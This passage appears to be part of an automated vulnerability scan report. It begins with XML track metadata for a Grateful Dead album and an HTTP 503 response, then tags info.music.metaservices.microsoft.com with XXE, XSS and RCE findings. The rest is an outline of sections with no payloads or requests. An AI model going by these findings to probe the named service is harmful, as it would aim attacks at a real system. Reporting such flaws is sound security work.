</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 Estimated Prophet.m4a</filename>
<trackDuration>646698</trackDuration>
<bitrate>263896</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Loser</text>
<word>Loser</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Loser.m4a</filename>
<trackDuration>509956</trackDuration>
<bitrate>262912</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>China Cat Sunflower</text>
<word>China</word>
<word>Cat</word>
<word>Sunflower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 China Cat Sunflower.m4a</filename>
<trackDuration>339104</trackDuration>
<bitrate>266408</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Looks Like Rain</text>
<word>Looks</word>
<word>Like</word>
<word>Rain</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 Looks Like Rain.m4a</filename>
<trackDuration>518385</trackDuration>
<bitrate>263232</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>I Know You Rider</text>
<word>I</word>
<word>Know</word>
<word>You</word>
<word>Rider</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 I Know You Rider.m4a</filename>
<trackDuration>327354</trackDuration>
<bitrate>265440</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Tennessee Jed.m4a</filename>
<trackDuration>549500</trackDuration>
<bitrate>265832</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 China Doll.m4a</filename>
<trackDuration>444360</trackDuration>
<bitrate>272624</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>Minglewood Blues</text>
<word>Minglewood</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Minglewood Blues.m4a</filename>
<trackDuration>365342</trackDuration>
<bitrate>266128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Playing Jam</text>
<word>Playing</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Playing Jam.m4a</filename>
<trackDuration>100147</trackDuration>
<bitrate>267128</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Sugaree</text>
<word>Sugaree</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Sugaree.m4a</filename>
<trackDuration>858697</trackDuration>
<bitrate>265848</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>2-08 Drums.m4a</filename>
<trackDuration>159196</trackDuration>
<bitrate>266240</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Promised Land</text>
<word>Promised</word>
<word>Land</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 Promised Land.m4a</filename>
<trackDuration>275249</trackDuration>
<bitrate>267664</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>2-09 Not Fade Away.m4a</filename>
<trackDuration>605390</trackDuration>
<bitrate>267344</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>10</trackNumber>
<filename>2-10 Playing In the Band.m4a</filename>
<trackDuration>288577</trackDuration>
<bitrate>259960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 503 Service Unavailable
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
Status-Code: 503
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 00:08:30 GMT
Connection: close

The service is unavailable.

Report generated by XSS.Cx at Tue Jul 16 08:41:01 EDT 2019.

info.music.metaservices.microsoft.com, XXE, XSS, RCE, Example, Proof of Concept, PoC

Vulnerability Summary

Contents

Summary

Issue detail

Issue background

Issue remediation

References

Vulnerability classifications

Request

Collaborator DNS interaction

Collaborator HTTP interaction

Request to Collaborator

Response from Collaborator

Issue background

Remediation background

References

Vulnerability classifications

Summary

Issue detail

Remediation detail

Request

Response

Collaborator DNS interaction

Summary

Issue detail

Remediation detail

Request

Collaborator DNS interaction

Summary

Issue detail

Remediation detail

Request

Collaborator DNS interaction

Summary

Issue detail

Remediation detail

Request

Collaborator DNS interaction

Issue background

Remediation background

References

Vulnerability classifications

Summary

Issue detail

Remediation detail

Request

Response

Collaborator HTTP interaction

Request to Collaborator

Response from Collaborator

Summary

Issue detail

Remediation detail

Request

Response

Collaborator HTTP interaction

Request to Collaborator

Response from Collaborator

Summary

Issue detail

Remediation detail

Request

Collaborator HTTP interaction

Request to Collaborator

Response from Collaborator

Summary

Issue detail

Remediation detail

Request

Collaborator HTTP interaction

Request to Collaborator

Response from Collaborator

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail